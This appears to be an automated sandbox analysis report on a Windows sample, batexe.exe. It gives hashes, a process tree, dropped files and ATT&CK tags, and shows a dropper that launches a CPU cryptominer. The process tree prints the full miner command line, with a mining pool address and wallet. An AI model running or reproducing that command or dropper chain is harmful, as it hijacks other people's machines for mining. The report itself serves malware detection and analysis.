73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21/02/2024, 17:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
60	b2e.exe
4848	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4848	cpuminer-sse2.exe
4848	cpuminer-sse2.exe
4848	cpuminer-sse2.exe
4848	cpuminer-sse2.exe
4848	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1492-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1492 wrote to memory of 60	1492	batexe.exe	75
PID 1492 wrote to memory of 60	1492	batexe.exe	75
PID 1492 wrote to memory of 60	1492	batexe.exe	75
PID 60 wrote to memory of 4764	60	b2e.exe	76
PID 60 wrote to memory of 4764	60	b2e.exe	76
PID 60 wrote to memory of 4764	60	b2e.exe	76
PID 4764 wrote to memory of 4848	4764	cmd.exe	79
PID 4764 wrote to memory of 4848	4764	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1492
- C:\Users\Admin\AppData\Local\Temp\54A.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\54A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\54A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:60
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A2C.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4764
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\54A.tmp\b2e.exe

Filesize
3.1MB

MD5
0495975d11bb06c6adc4265e86e94597

SHA1
e758426a007891150dcca25d2ecbb5007c60f115

SHA256
9fe6a0be2c54370202b13d792de1e78f37540b4056a94213a31f7d2f2974a42b

SHA512
78fde06f52ba4fb1e676e7e2d6b181111c7467896f189526380db707c4c9cc4c809cea15dba3bfce9b48e3f96b59cd198dbc9bd1d96c8a1b8873b0dfeac18a84

Download Submit
C:\Users\Admin\AppData\Local\Temp\54A.tmp\b2e.exe

Filesize
2.9MB

MD5
7fedbbc1f09436c6b018f08b7da90f3d

SHA1
ec83d3c77a5dbdd9ab347367f2a7e7af616e13db

SHA256
5074c0dcdde9e72e156b973e7a7e79ae01f2135b4dde1491e43f65a36776ae2c

SHA512
bc113322cf49980f76886e640408e3617537b464d714ad72131a1ed9bcd6c88d1768a18a731997bf73dfb37a963fc295617eb08ba3289c5590ade44b2923cf44

Download Submit
C:\Users\Admin\AppData\Local\Temp\A2C.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
146KB

MD5
78ff005339f1a091aeb10c36c11fac07

SHA1
af6a58582d60e4d4f9efeaf5129a4899637bb54e

SHA256
7d052dc5ccbb62ec4f6287c36f5d775df389f66e3b76dfa601b939e1047ff6b8

SHA512
039abb17b41972687afc24bc633cc20fed44ad9ca48435210c70c6e16c02be2dbb62cb350c39be187ac222415388e170928fd031f58e0604412c455ad8c7658b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
165KB

MD5
ae31fb476ffdc4f09561805b825142fd

SHA1
d87d339904d1612f3f95221eb4f24cd3a274cd53

SHA256
e65e47fb4e2d9f95893c9ded0e918dfc6c0bd8303974f001af138b2101a5e254

SHA512
9fd8d876821d8187f1d07d35b632d9fa00011d179c55398fe8f64e0cc63199cfa63d273655124e41fe85992088141a1d9422b853b3515fa30764dcb773e44a96

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
123KB

MD5
198d217dc9967b3886bb3b51bb5962b9

SHA1
d1ca8ae7787ceaba192aa07ce96b06fcc6a842ca

SHA256
de5ad169c9ab5e4ab791e06871b064e3d023fff0a1f9f8923db7c6811ebc54e1

SHA512
1d73bee02d2deb4eb268d6395113aa1a17d727d6b799fe5baef73a03f814b3ab795fb080285f81851ab497bad76c68a9dbd8c3c9a3e831c53b9ee05fe92a12a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
182KB

MD5
048f23f73beb5aaee4a8f00a50d13ea3

SHA1
dccc9e61050609250cd502a3e24641222b0b9302

SHA256
27afcce4d3cbeb0744e5de6c58e3ebb560c4abb778b1bcaf5b480636b71cceb3

SHA512
78a262d11dfd0068100d67052f9da8a160360acb539f4e5e695195905234a86c652ec056bdd19b83e70dda24ee16246f21a2d3300e051f27bcd5c85612e42815

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
312KB

MD5
45f144aee39bc75d2b9ac8f8d21fb6f2

SHA1
52c0d355d828de6d02cb2e914c2f46d1f00c7968

SHA256
be427bc2170952c36a9aa19144c3ef93289760d8a51ff1416344f8832a2e2f09

SHA512
680e022035694b72e769e3ecdb7929256b9074334e5601463a2303b3355bdf67de8525dbc40453e1d102a28855e8238c9900d71d12b020a7316af7540ada1590

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
274KB

MD5
5e62bdbff064b6cf255dfe7f11ba3c4b

SHA1
6d923611605b44e3ae0888dabfd6a5fdfd3d41af

SHA256
ed648a3d37bef643e8b91530eb9f175653df568b4049227194f055e16f29a96c

SHA512
687c1ca47a7520798b2b37fb12eb483f9d7f14e76498a668a06036429b55fcfc8cf7a68a3b232a3748932af248881d29b5af038f04750de17e7946714668b9af

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
119KB

MD5
1944e07bc70d63393c8b2462ced311a3

SHA1
4d0699341ec7dbd6eb2b528d8a139027d726cbde

SHA256
d3eed826a4771906d348e937260ac0a289feeafd1c62d827ad8ac587464d8beb

SHA512
89726614c798223869b3bde1bb409752b59ad0a31842e2a958857c3c441f546882ae8fc3dafd45579f5914df1191588b25e4f2248edd3cca516b0611fdbfe592

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
154KB

MD5
1ba174e9b89e5d624ab68b6f7d39665a

SHA1
9f3584f8143c06b890f902b32546ac6b877189fd

SHA256
c33c4a98e7983d1350ad8ad8ddee3d70aac42639da4766d0c0c2c976df47f72c

SHA512
7fef664440e3651fbb7587e0aed7f64827228cd85f2c9475080100a49b50808c0d4b7e418ad5ffd4743d9d50cbeaa549ccfa8da73291777415cc4a405a38297e

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
143KB

MD5
687168f3952ff155e1d2dc18d26c589f

SHA1
10041853e1e390f828b0a8f3b434587615690471

SHA256
77de8277ba316515387b82278fe574dbfa1f6084c4999ac3acdc317c03b981e4

SHA512
69d7a77b9b7b20ba7646e83adfc936b43da0076cfe1ed062a7d6a58c0e33adec41fcb9adc212820d8eaed4e545d6311254c05a139885ee8b478c32b26654fd19

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
272KB

MD5
7aa3310051c10c089b484d07fc485320

SHA1
7cf97d9770e350e63a562f1b68b00e0b3854c384

SHA256
305392c87cc1d2cf55251ceb47e54f905adae2a8905c9dc378c2dbe742c9f49d

SHA512
043c0f093fa3bf5ff09f41de7e7a295390f72b6acf076814aacb1a07d30e1d55a7dbc8086fd0920aaf6ecf9c2beac0befea121f34c84a270f5f87ba78fa45400

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
131KB

MD5
f97952bced5f92d0bb4688dec05e9113

SHA1
2422471cf3b6eb89a5480bf7df3c168c9cfe23b2

SHA256
7f3f73ff034d9c71fa959041b9b7034a46188e9a34bb0d34376a9e0d158ad5a7

SHA512
9b59cceed2bc37048aaa11b1dc3acf9c5e00fad6a257b482815a857cd44aa0245384c5e27e409779ae8bb83953d19c58443dfb7687c9193259c1983b8b67f806

Download Submit
memory/60-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/60-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1492-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4848-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4848-43-0x0000000052D70000-0x0000000052E08000-memory.dmp

Filesize
608KB

Download
memory/4848-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4848-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4848-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4848-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4848-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4848-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4848-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4848-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4848-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4848-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download